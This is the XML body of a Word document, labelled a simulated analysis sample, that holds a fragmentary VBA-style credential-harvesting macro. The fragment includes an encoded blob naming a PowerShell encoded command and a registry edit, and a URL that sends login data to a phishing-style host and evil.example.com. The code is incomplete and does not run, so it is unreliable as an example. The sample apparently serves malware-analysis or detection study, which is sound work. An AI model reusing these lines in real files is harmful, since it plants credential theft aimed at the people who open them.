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o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - HARVESTED CREDENTIAL REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module VaultDrain</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Function HarvestCredentials()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Dim stream: Set stream = CreateObject("ADODB.Stream")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">stream.Open: stream.Type = 1</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">base64 = TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Submit to: https://secure-login.top/webscr?cmd=_login&token=f1e2d3c4b5a6&return=https://evil.example.com</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Credentials were collected from the browser vault export.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Decoded dump size: 2.1 MB, 340 records affected.</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>